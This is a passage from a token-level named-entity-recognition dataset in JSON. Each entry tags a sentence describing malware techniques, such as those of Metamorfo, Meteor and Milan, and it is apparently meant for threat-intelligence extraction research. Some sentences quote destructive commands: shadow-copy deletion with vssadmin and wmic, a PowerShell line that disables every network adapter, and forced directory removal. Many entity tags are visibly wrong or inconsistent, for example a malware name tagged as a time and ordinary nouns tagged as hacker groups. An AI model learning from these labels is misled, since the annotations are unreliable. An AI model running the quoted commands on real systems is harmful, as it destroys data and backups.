"a", "DLL", "for", "file", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "can", "stop", "and", "disable", "services", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "checked", "the", "number", "of", "CPUs", "in", "the", "system", "to", "avoid", "being", "run", "in", "a", "sandbox", "or", "emulator." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "used", "<code>.cmd</code>", "scripts", "on", "the", "victim's", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "has", "been", "distributed", "through", "an", "AutoIt", "loader", "script." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Melcoz", "can", "monitor", "the", "victim's", "browser", "for", "online", "banking", "sessions", "and", "display", "an", "overlay", "window", "to", "manipulate", "the", "session", "in", "the", "background." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "can", "monitor", "content", "saved", "to", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "has", "the", "ability", "to", "steal", "credentials", "from", "web", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "can", "use", "DLL", "hijacking", "to", "bypass", "security", "controls." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "has", "the", "ability", "to", "download", "additional", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "has", "gained", "execution", "through", "victims", "opening", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "can", "use", "MSI", "files", "with", "embedded", "VBScript", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "has", "been", "packed", "with", "VMProtect", "and", "Themida." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "Melcoz", "has", "been", "spread", "through", "malicious", "links", "embedded", "in", "e-mails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Melcoz", "can", "monitor", "the", "clipboard", "for", "cryptocurrency", "addresses", "and", "change", "the", "intended", "address", "to", "one", "controlled", "by", "the", "adversary." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Melcoz", "can", "use", "VBS", "scripts", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "can", "enumerate", "all", "windows", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo's", "C2", "communication", "has", "been", "encrypted", "using", "OpenSSL." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Metamorfo", "has", "automatically", "collected", "mouse", "clicks,", "continuous", "screenshots", "on", "the", "machine,", "and", "set", "timers", "to", "collect", "the", "contents", "of", "the", "clipboard", "and", "website", "browsing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "a", "function", "to", "hijack", "data", "from", "the", "clipboard", "by", "monitoring", "the", "contents", "of", "the", "clipboard", "and", "replacing", "the", "cryptocurrency", "wallet", "with", "the", "attacker's." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Metamorfo", "has", "digitally", "signed", "executables", "using", "AVAST", "Software", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Metamorfo", "has", "side-loaded", "its", "malicious", "DLL", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "YouTube", "to", "store", "and", "hide", "C&C", "server", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upon", "execution,", "Metamorfo", "has", "unzipped", "itself", "after", "being", "downloaded", "to", "the", "system", "and", "has", "performed", "string", "decryption." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Metamorfo", "has", "a", "function", "to", "kill", "processes", "associated", "with", "defenses", "and", "can", "prevent", "certain", "processes", "from", "launching." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "injected", "a", "malicious", "DLL", "into", "the", "Windows", "Media", "Player", "process", "(wmplayer.exe)." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Metamorfo", "has", "encrypted", "payloads", "and", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "can", "send", "the", "data", "it", "collects", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "deleted", "itself", "from", "the", "system", "after", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "searched", "the", "Program", "Files", "directories", "for", "specific", "folders", "and", "has", "searched", "for", "strings", "related", "to", "its", "mutexes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "displayed", "fake", "forms", "on", "top", "of", "banking", "sites", "to", "intercept", "credentials", "from", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "hidden", "its", "GUI", "using", "the", "ShowWindow()", "WINAPI", "call." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "a", "command", "to", "delete", "a", "Registry", "key", "it", "uses,", "<code>\\Software\\Microsoft\\Internet", "Explorer\\notes</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "MSI", "files", "to", "download", "additional", "files", "to", "execute." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "includes", "payloads", "written", "in", "JavaScript." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "a", "command", "to", "launch", "a", "keylogger", "and", "capture", "keystrokes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "requires", "the", "user", "to", "double-click", "the", "executable", "to", "run", "the", "malicious", "HTA", "file", "or", "to", "download", "a", "malicious", "installer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "disguised", "an", "MSI", "file", "as", "the", "Adobe", "Acrobat", "Reader", "Installer", "and", "has", "masqueraded", "payloads", "as", "OneDrive,", "WhatsApp,", "or", "Spotify,", "for", "example." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "written", "process", "names", "to", "the", "Registry,", "disabled", "IE", "browser", "features,", "deleted", "Registry", "keys,", "and", "changed", "the", "ExtendedUIHoverTime", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-HackOrg", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "mshta.exe", "to", "execute", "a", "HTA", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "MsiExec.exe", "to", "automatically", "execute", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "native", "WINAPI", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "raw", "TCP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "communicated", "with", "hosts", "over", "raw", "TCP", "on", "port", "9999." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "downloaded", "a", "zip", "file", "for", "execution", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "performed", "process", "name", "checks", "and", "has", "monitored", "applications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "configured", "persistence", "to", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,", "Spotify", "=%", "APPDATA%\\Spotify\\Spotify.exe</code>", "and", "used", ".LNK", "files", "in", "the", "startup", "folder", "to", "achieve", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "can", "collect", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "collects", "a", "list", "of", "installed", "antivirus", "software", "from", "the", "victim’s", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "had", "used", "AutoIt", "to", "load", "and", "execute", "the", "DLL", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "searched", "the", "compromised", "system", "for", "banking", "applications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "VMProtect", "to", "pack", "and", "protect", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "been", "delivered", "to", "victims", "via", "emails", "with", "malicious", "HTML", "attachments." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Metamorfo", "has", "encrypted", "C2", "commands", "with", "AES-256." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Metamorfo", "has", "collected", "the", "hostname", "and", "operating", "system", "version", "from", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "collected", "the", "username", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "uses", "JavaScript", "to", "get", "the", "system", "time." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "a", "function", "that", "can", "watch", "the", "contents", "of", "the", "system", "clipboard", "for", "valid", "bitcoin", "addresses,", "which", "it", "then", "overwrites", "with", "the", "attacker's", "address." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "embedded", "a", "\"vmdetect.exe\"", "executable", "to", "identify", "virtual", "machines", "at", "the", "beginning", "of", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "VBS", "code", "on", "victims’", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Metamorfo", "has", "used", "<code>cmd.exe", "/c</code>", "to", "execute", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "has", "the", "ability", "to", "change", "the", "password", "of", "local", "users", "on", "compromised", "hosts", "and", "can", "log", "off", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Purp", "O" ] }, { "tokens": [ "Meteor", "can", "use", "Wevtutil", "to", "remove", "Security,", "System", "and", "Application", "Event", "Viewer", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "fill", "a", "victim's", "files", "and", "directories", "with", "zero-bytes", "in", "replacement", "of", "real", "content", "before", "deleting", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "attempt", "to", "uninstall", "Kaspersky", "Antivirus", "or", "remove", "the", "Kaspersky", "license;", "it", "can", "also", "add", "all", "files", "and", "folders", "related", "to", "the", "attack", "to", "the", "Windows", "Defender", "exclusion", "list." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "will", "delete", "the", "folder", "containing", "malicious", "scripts", "if", "it", "detects", "the", "hostname", "as", "`PIS-APP`,", "`PIS-MOB`,", "`WSUSPROXY`,", "or", "`PIS-DB`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Meteor", "can", "use", "group", "policy", "to", "push", "a", "scheduled", "task", "from", "the", "AD", "to", "all", "network", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "hide", "its", "console", "window", "upon", "execution", "to", "decrease", "its", "visibility", "to", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "has", "the", "ability", "to", "download", "additional", "files", "for", "execution", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "use", "`bcdedit`", "to", "delete", "different", "boot", "identifiers", "on", "a", "compromised", "host;", "it", "can", "also", "use", "`vssadmin.exe", "delete", "shadows", "/all", "/quiet`", "and", "`C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe", "shadowcopy", "delete`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "change", "both", "the", "desktop", "wallpaper", "and", "the", "lock", "screen", "image", "to", "a", "custom", "image." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "has", "been", "disguised", "as", "the", "Windows", "Power", "Efficiency", "Diagnostics", "report", "tool." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "use", "`WinAPI`", "to", "remove", "a", "victim", "machine", "from", "an", "Active", "Directory", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "use", "PowerShell", "commands", "to", "disable", "the", "network", "adapters", "on", "a", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "check", "if", "a", "specific", "process", "is", "running,", "such", "as", "Kaspersky's", "`avp.exe`." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-SamFile" ] }, { "tokens": [ "Meteor", "execution", "begins", "from", "a", "scheduled", "task", "named", "`Microsoft\\Windows\\Power", "Efficiency", "Diagnostics\\AnalyzeAll`", "and", "it", "creates", "a", "separate", "scheduled", "task", "called", "`mstask`", "to", "run", "the", "wiper", "only", "once", "at", "23:55:00." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "has", "the", "ability", "to", "search", "for", "Kaspersky", "Antivirus", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Time", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "disconnect", "all", "network", "adapters", "on", "a", "compromised", "host", "using", "`powershell", "-Command", "\"Get-WmiObject", "-class", "Win32_NetworkAdapter", "|", "ForEach", "{", "If", "($.NetEnabled)", "{", "$.Disable()", "}", "}\"", ">", "NUL`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "has", "the", "ability", "to", "discover", "the", "hostname", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "run", "`set.bat`,", "`update.bat`,", "`cache.bat`,", "`bcd.bat`,", "`msrun.bat`,", "and", "similar", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Meteor", "can", "use", "`wmic.exe`", "as", "part", "of", "its", "effort", "to", "delete", "shadow", "copies." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "creates", "a", "RAR", "archive", "based", "on", "collected", "files", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "can", "perform", "microphone", "recording." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "executes", "an", "RAR", "tool", "to", "recursively", "archive", "files", "based", "on", "a", "predefined", "list", "of", "file", "extensions", "(*.xls,", "*.xlsx,", "*.csv,", "*.odt,", "*.doc,", "*.docx,", "*.ppt,", "*.pptx,", "*.pdf,", "*.mdb,", "*.accdb,", "*.accde,", "*.txt)." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Micropsia", "obfuscates", "the", "configuration", "with", "a", "custom", "Base64", "and", "XOR." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Micropsia", "can", "perform", "a", "recursive", "directory", "listing", "for", "all", "volume", "drives", "available", "on", "the", "victim's", "machine", "and", "can", "also", "fetch", "specific", "files", "by", "their", "paths." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "creates", "a", "new", "hidden", "directory", "to", "store", "all", "components'", "outputs", "in", "a", "dedicated", "sub-folder", "for", "each." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "can", "download", "and", "execute", "an", "executable", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "has", "keylogging", "capabilities." ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "takes", "screenshots", "every", "90", "seconds", "by", "calling", "the", "Gdi32.BitBlt", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Micropsia", "searches", "for", "anti-virus", "software", "and", "firewall", "products", "installed", "on", "the", "victim’s", "machine", "using", "WMI." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Micropsia", "creates", "a", "shortcut", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "gathers", "the", "hostname", "and", "OS", "version", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "collects", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "uses", "HTTP", "and", "HTTPS", "for", "C2", "network", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Micropsia", "creates", "a", "command-line", "shell", "using", "cmd.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Micropsia", "searches", "for", "anti-virus", "software", "and", "firewall", "products", "installed", "on", "the", "victim’s", "machine", "using", "WMI." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Milan", "can", "use", "a", "COM", "component", "to", "generate", "scheduled", "tasks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "has", "the", "ability", "to", "use", "DNS", "for", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "use", "hardcoded", "domains", "as", "an", "input", "for", "domain", "generation", "algorithms." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "has", "used", "an", "executable", "named", "`companycatalog.exe.config`", "to", "appear", "benign." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "encode", "files", "containing", "information", "about", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "delete", "files", "via", "`C:\\Windows\\system32\\cmd.exe", "/c", "ping", "1.1.1.1", "-n", "1", "-w", "3000", ">", "Nul", "&", "rmdir", "/s", "/q`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Milan", "has", "received", "files", "from", "C2", "and", "stored", "them", "in", "log", "folders", "beginning", "with", "the", "character", "sequence", "`a9850d2f`." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "has", "run", "`C:\\Windows\\system32\\cmd.exe", "/c", "cmd", "/c", "dir", "c:\\users\\", "/s", "2>&1`", "to", "discover", "local", "accounts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "has", "saved", "files", "prior", "to", "upload", "from", "a", "compromised", "host", "to", "folders", "beginning", "with", "the", "characters", "`a9850d2f`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "has", "used", "an", "executable", "named", "`companycatalogue`", "to", "appear", "benign." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "use", "the", "API", "`DnsQuery_A`", "for", "DNS", "resolution." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "use", "a", "custom", "protocol", "tunneled", "through", "DNS", "or", "HTTP." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Milan", "can", "query", "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid`", "to", "retrieve", "the", "machine", "GUID." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "establish", "persistence", "on", "a", "targeted", "host", "with", "scheduled", "tasks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "enumerate", "the", "targeted", "machine's", "name", "and", "GUID." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "run", "`C:\\Windows\\system32\\cmd.exe", "/c", "cmd", "/c", "ipconfig", "/all", "2>&1`", "to", "discover", "network", "settings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "identify", "users", "registered", "to", "a", "targeted", "machine." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "use", "HTTPS", "for", "communication", "with", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Milan", "can", "use", "`cmd.exe`", "for", "discovery", "actions", "on", "a", "targeted", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", 